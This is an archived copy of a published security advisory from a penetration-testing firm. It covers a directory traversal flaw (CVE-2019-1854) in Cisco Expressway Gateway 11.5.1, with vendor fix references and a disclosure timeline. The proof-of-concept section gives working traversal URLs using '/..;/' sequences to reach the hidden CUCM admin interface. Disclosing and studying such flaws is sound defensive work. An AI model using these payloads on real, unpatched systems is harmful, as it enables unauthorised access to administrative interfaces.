exploit the possibilities

Cisco Expressway Gateway 11.5.1 Directory Traversal

Cisco Expressway Gateway 11.5.1 Directory Traversal
Posted May 17, 2019
Site redteam-pentesting.de

Cisco Expressway Gateway version 11.5.1 suffers from a directory traversal vulnerability.

tags | exploit
systems | cisco
advisories | CVE-2019-1854
MD5 | 5e57b3dc6cda4bfab16fe178906a4ab3

Cisco Expressway Gateway 11.5.1 Directory Traversal

Change Mirror Download
Advisory: Directory Traversal in Cisco Expressway Gateway

RedTeam Pentesting discovered a directory traversal vulnerability in
Cisco Expressway which enables access to administrative web interfaces.


Details
=======

Product: Cisco Expressway Gateway
Affected Versions: 11.5.1, possibly others
Fixed Versions: See Cisco Bug ID CSCvo47769 [1]
Vulnerability Type: Directory Traversal
Security Risk: medium
Vendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190501-expressway-traversal
Vendor Status: fixed version released
Vendor ID: Cisco Bug ID CSCvo47769
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-002
Advisory Status: published
CVE: CVE-2019-1854
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1854


Introduction
============

"Cisco Expressway offers users outside your firewall simple, highly
secure access to all collaboration workloads, including video, voice,
content, IM, and presence. Collaborate with people who are on
third-party systems and endpoints or in other companies. Help
teleworkers and Cisco Jabber mobile users work more effectively on their
device of choice."
(from the Cisco Expressway Series website [2])


More Details
============

Cisco Expressway Gateway is a kind of reverse proxy which implements
authentication mechanisms and forwards authorised requests to services
based on information encoded within the requested URL. It supports two
different URI layouts. The first layout only includes the base64-encoded
domain name of the gateway itself:

------------------------------------------------------------------------
https://example.com:8443/$(echo -n example.com|base64)/test123

https://example.com:8443/ZXhhbXBsZS5jb20=/test123
------------------------------------------------------------------------

The second layout additionally specifies the protocol, hostname and port
number of a target system which is to be contacted through the gateway:

------------------------------------------------------------------------
https://example.com:8443/$(echo -n example.com/https/example.int/8443|base64)/test123

https://example.com:8443/ZXhhbXBsZS5jb20vaHR0cHMvZXhhbXBsZS5pbnQvODQ0Mw==/test123
------------------------------------------------------------------------

RedTeam Pentesting analysed a Cisco Unified Communication Manager (CUCM)
instance which was accessible via a Cisco Expressway Gateway. In this
configuration, a directory traversal vulnerability was identified. It
leverages the methodology described in "Breaking Parser Logic" [3] by
Orange Tsai. The CUCM service, which is implemented using the Tomcat [4]
application server, interprets URLs different to the upstream
reverse proxy. By accessing a specially crafted URL, attackers can
access the CUCM manager application, even though it is not exposed by
the Cisco Expressway Gateway.


Proof of Concept
================

First, an attacker must authenticate to the Cisco Expressway Gateway.
A login can be performed by accessing the following URL using
HTTP-Basic-Authentication:

------------------------------------------------------------------------
https://example.com:8443/ZXhhbXBsZS5jb20=/get_edge_config
------------------------------------------------------------------------

Afterwards, the resources on the CUCM may be accessed through the Cisco
Expressway Gateway. By inserting repeated occurrences of "/..;/" into
the URL, the directory traversal vulnerability can be exploited. Using
the following URL, a list of applications installed on the CUCM system
can be retrieved:

------------------------------------------------------------------------
https://example.com:8443/ZXhhbXBsZS5jb20vaHR0cHMvZXhhbXBsZS5pbnQvODQ0Mw==/cucm-uds/user/example_user/..;/..;/..;/
------------------------------------------------------------------------

Similarly, the CUCM manager application can be accessed as follows:

------------------------------------------------------------------------
https://example.com:8443/ZXhhbXBsZS5jb20vaHR0cHMvZXhhbXBsZS5pbnQvODQ0Mw==/cucm-uds/user/example_user/..;/..;/..;/ccmadmin
------------------------------------------------------------------------


Workaround
==========

Prevent access to the Cisco Expressway Gateway by untrusted parties.


Fix
===

See Cisco Bug ID CSCvo47769 [1] for affected software releases and
available patches.


Security Risk
=============

The vulnerability can be used to access administrative interfaces which
are usually not reachable. Attackers could potentially read or modify
sensitive information via these interfaces. However, it is necessary to
have an authorised user account to access the Cisco Expressway Gateway.
Therefore, the vulnerability poses a medium risk.


Timeline
========

2019-02-01 Vulnerability identified
2019-02-20 Customer approved disclosure to vendor
2019-02-21 Vendor notified
2019-02-21 Receipt of advisory acknowledged by vendor
2019-04-16 Vendor announces public disclosure for May 1st to RedTeam Pentesting
2019-05-01 Vendor publishes advisory
2019-05-16 Customer approves release of this advisory
2019-05-17 Advisory released


References
==========
[1] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvo47769
[2] https://www.cisco.com/c/en/us/products/unified-communications/expressway-series/index.html
[3] https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Orange%20Tsai%20-%20Updated/DEFCON-26-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-and-Pop-0days-Out-Updated.pdf
[4] https://tomcat.apache.org


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    19 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close